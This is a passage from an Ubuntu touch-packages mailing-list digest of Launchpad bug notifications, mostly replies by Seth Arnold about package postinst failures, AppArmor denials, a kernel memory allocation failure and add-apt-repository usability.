  if ! pidof /usr/bin/X > /dev/null && [ -x 
/usr/share/update-notifier/notify-reboot-required ]; then
  

[Touch-packages] [Bug 1832919] Re: installed libssl1.1:amd64 package post-installation script subprocess returned error exit status 10

[Seth Arnold]

Stephen, AMD invented the 64 bit extensions to the x86 instruction set
and brought their processors to market well before Intel brought theirs
to market. Thus AMD won a huge amount of name recognition. Debian
standardized on "amd64" to name packages for the architecture many years
ago.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832919

Title:
  installed libssl1.1:amd64 package post-installation script subprocess
  returned error exit status 10

Status in openssl package in Ubuntu:
  Confirmed

Bug description:
  The error happens when trying to configure libssl1.1:amd64 (dpkg
  --configure -D 2  libssl1.1)

  dpkg: error processing package libssl1.1:amd64 (--configure):
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10
  D02: post_script_tasks - ensure_diversions
  D02: post_script_tasks - trig_incorporate
  D02: check_triggers_cycle pnow=libc-bin:amd64 first
  Processing triggers for libc-bin (2.27-3ubuntu1) ...
  D02: post_postinst_tasks - trig_incorporate
  Errors were encountered while processing:
   libssl1.1:amd64

  The attempted fix
  Line #153 of file /var/lib/dpkg/info/libssl1.1\:amd64.postinst
  - db_get libraries/restart-without-asking
  + db_get libraries/restart-without-asking || true

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1832919/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1820203] Re: [MIR] libpgm as dependency of mailman3

[Seth Arnold]

** Attachment added: "Coverity results"
   
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+attachment/5270475/+files/coverity.txt

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libpgm in Ubuntu.
https://bugs.launchpad.net/bugs/1820203

Title:
  [MIR] libpgm as dependency of mailman3

Status in libpgm package in Ubuntu:
  New

Bug description:
  [Availability]
  The package is already universe for quite a while and build/works fine so far.
  It is for example already used for 
https://lists.canonical.com/mailman3/postorius/lists/
  OTOH it is a library that can/could be used for much more than just the 
mailman3 stack.

  It builds on all architectures (arch:any)

  [Security]

  No known CVEs found.
  The protocol had some issues a few years ago and related issues in 
Cisco/Microsoft products, but I found no open issues in the package.
  => https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pgm

  [Quality assurance]

  As part of the mailman3 stacks as of now (Disco) this installs fine and works 
fine.
  On itself it is useful to (many) other dependencies and does not need a post 
install configuration on its own.

  The package does not ask debconf questions.

  One known bug in each of Ubuntu and Debian.
  - The Ubunut bug is outdated and should be ok with 5.2 which we have.
  - The Debian bug is only important for solaris builds
  Upstream has 16 open and 27 closed issues - nothing very severe for our 
intentions.

  The package seems get updates by Debian as needed.
  But upstream seems to have stopped releasing after 2012.
  => https://github.com/steve-o/openpgm/releases
  After talking with one of the uploaders it became clear that they still work 
on master and fixes can be pulled from there as needed.
  https://github.com/steve-o/openpgm/commits/master

  No exotic HW involved.

  There are some tests in ./openpgm/pgm/test/ and ./openpgm/pgm/*_unittest.c 
but dh_auto_test isn't catching them.
  OTOH I can't even guarantee they would be usable, but TL;DR no build time 
tests run.

  d/watch is set up and ok.

  gNo Lintian warning except newer Standards/Compat versions and no
  HTTPS links uses or GPG checks - nothing severe.

  The package does not rely on demoted or obsolete packages.
  The Scons build system is a pain, but it seems to work as packaged by Debian 
so no complains.
  No new gt2k dependencies
  As mentioned the package itself might be abandoned/orphaned by upstream

  [UI standards]

  It uses i18n from gi18n-lib to provide the infrastructure, but I found no 
translations so far.
  But that is ok as this is a low level library without (a lot) of user visible 
strings - no translations (needed).
  No End-user applications that needs a standard conformant desktop file.

  [Dependencies]

  Some dependencies are not in main, but we drive MIR for all related packages
  that are not in main at the same time.
  Please check the list of bugs from the main Mailman3 MIR in bug 1775427 to 
get an overview.

  [Standards compliance]
  The package meets the FHS and Debian Policy standards.
  The packaging itself is very straight forward and uses dh_* as much as 
possible - the d/rules fits on one screen.

  [Maintenance]

  The Server team will subscribe for the package for maintenance, but in
  general it seems low on updates and currently is a sync from Debian.

  [Background]
  The package description explains the general purpose and context of the 
package well.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1832421] [NEW] openssl reboot needed message using incorrect path to X server

[Seth Arnold]

Public bug reported:

Hello, the openssl library postinst file is using pidof /usr/bin/X, but
that doesn't appear to be the path to the X11 server any more:

debian/libssl1.1.postinst:

# Only issue the reboot notification for servers; we proxy this by
# testing that the X server is not running (LP: #244250)
if ! pidof /usr/bin/X > /dev/null && [ -x 
/usr/share/update-notifier/notify-reboot-required ]; then
/usr/share/update-notifier/notify-reboot-required
fi


On my 18.04 LTS laptop:

$ ps auxw | grep Xorg
root  2440  0.5  0.4 495932 78996 tty7 Rsl+ May10 264:45 
/usr/lib/xorg/Xorg :0 vt7 -nolisten tcp -auth /var/l

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: openssl 1.1.1-1ubuntu2.1~18.04.1
ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
Uname: Linux 4.15.0-50-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
Date: Tue Jun 11 18:06:51 2019
InstallationDate: Installed on 2012-10-18 (2427 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: openssl
UpgradeStatus: Upgraded to bionic on 2018-05-02 (406 days ago)

** Affects: openssl (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832421

Title:
  openssl reboot needed message using incorrect path to X server

Status in openssl package in Ubuntu:
  New

Bug description:
  Hello, the openssl library postinst file is using pidof /usr/bin/X,
  but that doesn't appear to be the path to the X11 server any more:

  debian/libssl1.1.postinst:

  # Only issue the reboot notification for servers; we proxy this by
  # testing that the X server is not running (LP: #244250)
  if ! pidof /usr/bin/X > /dev/null && [ -x 
/usr/share/update-notifier/notify-reboot-required ]; then
  /usr/share/update-notifier/notify-reboot-required
  fi

  
  On my 18.04 LTS laptop:

  $ ps auxw | grep Xorg
  root  2440  0.5  0.4 495932 78996 tty7 Rsl+ May10 264:45 
/usr/lib/xorg/Xorg :0 vt7 -nolisten tcp -auth /var/l

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: openssl 1.1.1-1ubuntu2.1~18.04.1
  ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
  Uname: Linux 4.15.0-50-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Tue Jun 11 18:06:51 2019
  InstallationDate: Installed on 2012-10-18 (2427 days ago)
  InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: openssl
  UpgradeStatus: Upgraded to bionic on 2018-05-02 (406 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1832421/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1730908] Re: [ 1549.847151] audit: type=1400 audit(1510129355.497:61): apparmor="DENIED" operation="file_mmap" profile="/usr/bin/evince" name="/usr/lib/x86_64-linux-gnu/libproxy/

[Seth Arnold]

Hello Robert, thanks for this; could you please file this bug against
the man-db package, and mention that this needs to be adjusted similar
to https://usn.ubuntu.com/4008-2/  ?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1730908

Title:
  [ 1549.847151] audit: type=1400 audit(1510129355.497:61):
  apparmor="DENIED" operation="file_mmap" profile="/usr/bin/evince"
  name="/usr/lib/x86_64-linux-
  gnu/libproxy/0.4.14/modules/network_networkmanager.so" pid=2062
  comm="evince" requested_mask="m" denied_mask="m" fsuid=1000 ouid=0

Status in apparmor package in Ubuntu:
  Expired

Bug description:
  Since I installed Ubuntu 17.10 I cannot print anymore.

  The only thing I see in the logs are many lines like the following:
  [ 1549.847151] audit: type=1400 audit(1510129355.497:61): apparmor="DENIED" 
operation="file_mmap" profile="/usr/bin/evince" 
name="/usr/lib/x86_64-linux-gnu/libproxy/0.4.14/modules/network_networkmanager.so"
 pid=2062 comm="evince" requested_mask="m" denied_mask="m" fsuid=1000 ouid=0

  I'm not sure it is the cause of my problems, but there is at least a
  problem with apparmor's configuration in Ubuntu 17.10

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1730908/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1831490] Re: kernel is out of memory and killed during a kernel sys_write operation

[Seth Arnold]

Can you run apport-collect 1831490 on this machine to collect additional
logs and data?

Thanks

** Also affects: linux (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1831490

Title:
  kernel is out of memory and killed during a kernel sys_write operation

Status in apparmor package in Ubuntu:
  New
Status in linux package in Ubuntu:
  New

Bug description:
  This error is being reproduced on i386 arch when using the pc-kernel
  snap from beta or candidate.

  > sudo snap install test-snapd-tools
  > dmesg

  [15131.806107] audit: type=1400 audit(1559585825.240:93): 
apparmor="STATUS" operation="profile_replace" profile="unconfined" 
name="snap-update-ns.test-snapd-tools" pid=18240 comm="apparmor_parser"
  [15131.871610] vmap allocation for size 73728 failed: use vmalloc= to 
increase size.
  [15131.871614] vmalloc: allocation failure: 68481 bytes
  [15131.871616] apparmor_parser: page allocation failure: order:0, 
mode:0x24000c2
  [15131.871619] CPU: 0 PID: 18242 Comm: apparmor_parser Not tainted 
4.4.0-150-generic #176-Ubuntu
  [15131.871620] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
1.10.2-1ubuntu1 04/01/2014
  [15131.871622]  c1b15967 5ed07e43 0286 cfee9e00 c13c12ef c1a1ce6c 
0001 cfee9e30
  [15131.871625]  c11821b6 c1a1b220 f40ba700  024000c2 cfee9e44 
c1a1ce6c cfee9e18
  [15131.871629]  5ed07e43 00010b81  cfee9e60 c11ba86f 024000c2 
 c1a1ce6c
  [15131.871632] Call Trace:
  [15131.871637]  [] dump_stack+0x58/0x79
  [15131.871640]  [] warn_alloc_failed+0xd6/0x110
  [15131.871643]  [] __vmalloc_node_range+0x1ef/0x210
  [15131.871645]  [] __vmalloc_node+0x66/0x70
  [15131.871648]  [] ? __aa_kvmalloc+0x28/0x60
  [15131.871650]  [] vmalloc+0x38/0x40
  [15131.871652]  [] ? __aa_kvmalloc+0x28/0x60
  [15131.871654]  [] __aa_kvmalloc+0x28/0x60
  [15131.871656]  [] aa_simple_write_to_buffer+0x34/0x90
  [15131.871658]  [] policy_update+0x73/0x230
  [15131.871660]  [] ? security_file_permission+0x3e/0xd0
  [15131.871662]  [] profile_replace+0x98/0xe0
  [15131.871664]  [] ? policy_update+0x230/0x230
  [15131.871666]  [] __vfs_write+0x22/0x50
  [15131.871668]  [] vfs_write+0x8c/0x1b0
  [15131.871669]  [] SyS_write+0x51/0xb0
  [15131.871672]  [] do_fast_syscall_32+0x9f/0x190
  [15131.871675]  [] sysenter_past_esp+0x3d/0x61
  [15131.871676] Mem-Info:
  [15131.871679] active_anon:16802 inactive_anon:2068 isolated_anon:0
  active_file:84472 inactive_file:25195 isolated_file:0
  unevictable:0 dirty:34 writeback:0 unstable:0
  slab_reclaimable:7222 slab_unreclaimable:14030
  mapped:8431 shmem:5785 pagetables:204 bounce:0
  free:289381 free_pcp:659 free_cma:0
  [15131.871685] DMA free:8848kB min:788kB low:984kB high:1180kB 
active_anon:636kB inactive_anon:0kB active_file:2720kB inactive_file:800kB 
unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15992kB 
managed:15916kB mlocked:0kB dirty:0kB writeback:0kB mapped:472kB shmem:308kB 
slab_reclaimable:484kB slab_unreclaimable:424kB kernel_stack:8kB pagetables:4kB 
unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB 
writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
  [15131.871686] lowmem_reserve[]: 0 834 1942 1942
  [15131.871692] Normal free:364440kB min:42432kB low:53040kB high:63648kB 
active_anon:30164kB inactive_anon:2776kB active_file:158404kB 
inactive_file:32020kB unevictable:0kB isolated(anon):0kB isolated(file):0kB 
present:897016kB managed:862444kB mlocked:0kB dirty:116kB writeback:0kB 
mapped:11176kB shmem:6332kB slab_reclaimable:28404kB slab_unreclaimable:55696kB 
kernel_stack:1040kB pagetables:348kB unstable:0kB bounce:0kB free_pcp:1336kB 
local_pcp:676kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 
all_unreclaimable? no
  [15131.871693] lowmem_reserve[]: 0 0 8863 8863
  [15131.871698] HighMem free:784236kB min:512kB low:14600kB high:28688kB 
active_anon:36408kB inactive_anon:5496kB active_file:176764kB 
inactive_file:67960kB unevictable:0kB isolated(anon):0kB isolated(file):0kB 
present:1134472kB managed:1134472kB mlocked:0kB dirty:20kB writeback:0kB 
mapped:22076kB shmem:16500kB slab_reclaimable:0kB slab_unreclaimable:0kB 
kernel_stack:0kB pagetables:464kB unstable:0kB bounce:0kB free_pcp:1300kB 
local_pcp:680kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 
all_unreclaimable? no
  [15131.871699] lowmem_reserve[]: 0 0 0 0
  [15131.871701] DMA: 12*4kB (UME) 10*8kB (UME) 7*16kB (ME) 5*32kB (UM) 2*64kB 
(U) 3*128kB (UM) 3*256kB (UM) 4*512kB (UME) 3*1024kB (ME) 1*2048kB (M) 0*4096kB 
= 8848kB
  [15131.871711] Normal: 87*4kB (UME) 106*8kB (UME) 168*16kB (UME) 195*32kB 
(UME) 135*64kB (UME) 161*128kB (ME) 120*256kB (ME) 61*512kB (UME) 25*1024kB 
(ME) 6*2048kB (M) 55*4096kB (M) = 364492kB
  [15131.871720] HighMem: 131*4kB 

[Touch-packages] [Bug 1831301] Re: sound doesn't works in both kernel. no one cards is recognize by system-

[Seth Arnold]

** Package changed: alsa-driver (Ubuntu) => linux (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1831301

Title:
  sound doesn't works in both kernel. no one cards is recognize by
  system-

Status in linux package in Ubuntu:
  New

Bug description:
  .

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: alsa-base (not installed)
  ProcVersionSignature: Ubuntu 5.0.0-15.16~18.04.1-generic 5.0.6
  Uname: Linux 5.0.0-15-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Sat Jun  1 04:26:10 2019
  InstallationDate: Installed on 2019-04-03 (58 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=it_IT.UTF-8
   SHELL=/bin/bash
  SourcePackage: alsa-driver
  UpgradeStatus: No upgrade log present (probably fresh install)
  mtime.conffile..etc.modprobe.d.alsa-base.conf: 2019-05-31T22:19:11.232515

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1831301/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1713435] Re: package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

[Seth Arnold]

Hi Michael, thanks for reporting back the solution -- we're fine here,
nothing needs doing.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1713435

Title:
  package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  Expired

Bug description:
  invoke-rc.d: initscript ssh, action "start" failed.
  ● ssh.service - OpenBSD Secure Shell server
 Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: 
enabled)
 Active: failed (Result: exit-code) since Mon 2017-08-28 14:36:40 IST; 9ms 
ago
Process: 21687 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, 
status=255)
   Main PID: 21687 (code=exited, status=255)

  Aug 28 14:36:40 LinuxMachine systemd[1]: Starting OpenBSD Secure Shell 
server...
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Main process exited, 
c...a
  Aug 28 14:36:40 LinuxMachine systemd[1]: Failed to start OpenBSD Secure 
Shel
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Unit entered failed 
state.
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Failed with result 
'ex

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.2
  ProcVersionSignature: Ubuntu 4.4.0-92.115-generic 4.4.76
  Uname: Linux 4.4.0-92-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.10
  Architecture: amd64
  Date: Mon Aug 28 14:36:40 2017
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-12-12 (258 days ago)
  InstallationMedia: Ubuntu-GNOME 16.04.1 LTS "Xenial Xerus" - Release amd64 
(20160720)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.2
   apt  1.2.24
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1713435/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829588] Re: make it easy to add proposed; help text outdated

[Seth Arnold]

** Description changed:

- I want to do some SRU testing but I have to look up how to add the
- -proposed lines to apt sources every time I want to do this task. The
- wiki page for it is pretty verbose and includes text like: "Replace
- "xenial" with "trusty", "vivid", "utopic", "precise", or "lucid"
- depending on which release you are on. "
- 
  Adding -proposed should be as easy as running:
  
  sudo add-apt-repository proposed
  
  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid
  
- The help text includes a bunch of examples of things that users almost
- never need to do any more:
+ It'd be nice if add-apt-repository could work for all of:
  
- $ add-apt-repository -h
- [...]
-   Examples:
- apt-add-repository 'deb http://myserver/path/to/repo stable myrepo'
- apt-add-repository 'http://myserver/path/to/repo myrepo'
- apt-add-repository 'https://packages.medibuntu.org free non-free'
- apt-add-repository http://extras.ubuntu.com/ubuntu
- apt-add-repository ppa:user/repository
- apt-add-repository ppa:user/distro/repository
- apt-add-repository multiverse
+ - adding main
+ - adding restricted
+ - adding universe
+ - adding multiverse
+ - adding partners
  
- 
- https://packages.medibuntu.org is now owned by a commerce site, or squatter, 
or something similar. It also fails certificate validation. This should be 
removed.
- 
- http://extras.ubuntu.com/ubuntu/dists/ has precise through utopic. Maybe
- we shouldn't remove this yet, but someday we may want to revisit this
- one.
- 
- It'd be great to have examples of adding proposed, universe, security,
- updates, etc.
- 
- Maybe it'd be nice to put a reference to whatever tool would also enable
- ESM.
+ - adding proposed
+ - adding security
+ - adding universe
  
  Thanks
- 
- ProblemType: Bug
- DistroRelease: Ubuntu 18.04
- Package: software-properties-common 0.96.24.32.7
- ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
- Uname: Linux 4.15.0-50-generic x86_64
- NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
- ApportVersion: 2.20.9-0ubuntu7.6
- Architecture: amd64
- Date: Fri May 17 18:32:49 2019
- InstallationDate: Installed on 2012-10-18 (2402 days ago)
- InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
- PackageArchitecture: all
- ProcEnviron:
-  TERM=rxvt-unicode-256color
-  PATH=(custom, no user)
-  XDG_RUNTIME_DIR=
-  LANG=en_US.UTF-8
-  SHELL=/bin/bash
- SourcePackage: software-properties
- UpgradeStatus: Upgraded to bionic on 2018-05-02 (381 days ago)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  Confirmed

Bug description:
  Adding -proposed should be as easy as running:

  sudo add-apt-repository proposed

  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid

  It'd be nice if add-apt-repository could work for all of:

  - adding main
  - adding restricted
  - adding universe
  - adding multiverse
  - adding partners

  - adding proposed
  - adding security
  - adding universe

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1829588/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829588] Re: make it easy to add proposed; help text outdated

[Seth Arnold]

The wiki page does have the software properties method documented:
https://wiki.ubuntu.com/Testing/EnableProposed

I don't have software-properties-gtk installed (and until now didn't
know the name of the command to launch it), so apt-add-repository was my
first attempt.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  Confirmed

Bug description:
  Adding -proposed should be as easy as running:

  sudo add-apt-repository proposed

  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid

  It'd be nice if add-apt-repository could work for all of:

  - adding main
  - adding restricted
  - adding universe
  - adding multiverse
  - adding partners

  - adding proposed
  - adding security
  - adding universe

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1829588/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1458014] Re: audit_printk_skb slowing down boot

[Seth Arnold]

pito, it'd probably be best to head to https://askubuntu.com/ or #ubuntu
on irc.freenode.net to try to figure out where exactly your slow
performance is coming from.

Install the systemd-bootchart package, then at grub's kernel command
line, add init=/lib/systemd/systemd-bootchart

Attach the stripchart to the bug report.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1458014

Title:
  audit_printk_skb slowing down boot

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  Subjectively, my system slowed down after the recent GRUB update.

  As you can see from the following, audit_printk_skb is consuming a lot
  of boot time:

  [   13.243280] vboxdrv: Successfully loaded version 4.3.10_Ubuntu (interface 
0x001a0007).
  [   13.257947] vboxpci: IOMMU not found (not registered)
  [   13.862999] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
  [   13.865996] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
  [   14.195776] r8169 :04:00.0 eth0: link down
  [   14.195796] r8169 :04:00.0 eth0: link down
  [   14.195827] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
  [   14.196138] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
  [   15.769090] r8169 :04:00.0 eth0: link up
  [   15.769097] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
  [   16.223084] init: plymouth-upstart-bridge main process ended, respawning
  [   42.424836] audit_printk_skb: 195 callbacks suppressed
  [   42.424839] type=1400 audit(1431891089.974:77): apparmor="STATUS" 
operation="profile_replace" profile="unconfined" 
name="/usr/lib/cups/backend/cups-pdf" pid=2632 comm="apparmor_parser"
  [   42.424844] type=1400 audit(1431891089.974:78): apparmor="STATUS" 
operation="profile_replace" profile="unconfined" name="/usr/sbin/cupsd" 
pid=2632 comm="apparmor_parser"
  [   42.425185] type=1400 audit(1431891089.974:79): apparmor="STATUS" 
operation="profile_replace" profile="unconfined" name="/usr/sbin/cupsd" 
pid=2632 comm="apparmor_parser"
  (END)

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: apparmor 2.8.95~2430-0ubuntu5.1
  ProcVersionSignature: Ubuntu 3.13.0-53.88-generic 3.13.11-ckt19
  Uname: Linux 3.13.0-53-generic i686
  ApportVersion: 2.14.1-0ubuntu3.10
  Architecture: i386
  CurrentDesktop: Unity
  Date: Fri May 22 14:18:46 2015
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2014-04-29 (388 days ago)
  InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release i386 (20140417)
  ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-3.13.0-53-generic 
root=UUID=8cf458ab-4ff9-4505-9a16-27da1ea7ec10 ro quiet splash vt.handoff=7
  SourcePackage: apparmor
  Syslog:
   
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1458014/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829857] Re: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1

[Seth Arnold]

Hello, can you please provide the output of:

head -1 /usr/bin/pyclean
ls -l /usr/bin/python

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python-defaults in Ubuntu.
https://bugs.launchpad.net/bugs/1829857

Title:
  package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade:
  subprocess new pre-removal script returned error exit status 1

Status in python-defaults package in Ubuntu:
  Incomplete
Status in python-django package in Ubuntu:
  New

Bug description:
  The installation or removal of a software package failed.

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: python-django 1.6.11-0ubuntu1.3
  ProcVersionSignature: Ubuntu 4.4.0-142.168~14.04.1-generic 4.4.167
  Uname: Linux 4.4.0-142-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.29
  Architecture: amd64
  Date: Tue May 21 17:26:39 2019
  DuplicateSignature: package:python-django:1.6.11-0ubuntu1.2:subprocess new 
pre-removal script returned error exit status 1
  ErrorMessage: subprocess new pre-removal script returned error exit status 1
  InstallationDate: Installed on 2016-08-11 (1012 days ago)
  InstallationMedia: Ubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 
(20160217.1)
  PackageArchitecture: all
  RelatedPackageVersions:
   dpkg 1.17.5ubuntu5.8
   apt  1.0.1ubuntu2.19
  SourcePackage: python-django
  Title: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: 
subprocess new pre-removal script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python-defaults/+bug/1829857/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829885] Re: Exception during pm.DoInstall(): E:Sub-process /usr/bin/dpkg returned an error code (1)

[Seth Arnold]

Probably this represents an LVM2 or hardware error instead of something
specific to certificates.

Thanks

** Package changed: ca-certificates (Ubuntu) => ubuntu

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1829885

Title:
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned
  an error code (1)

Status in Ubuntu:
  New

Bug description:
  Encountered during a do-release-upgrade from 16.04.6 LTS to 18.04.2
  LTS.

  Processing triggers for resolvconf (1.79ubuntu10.18.04.3) ...
  Errors were encountered while processing:
   ca-certificates
   ubuntu-release-upgrader-core
   update-manager-core
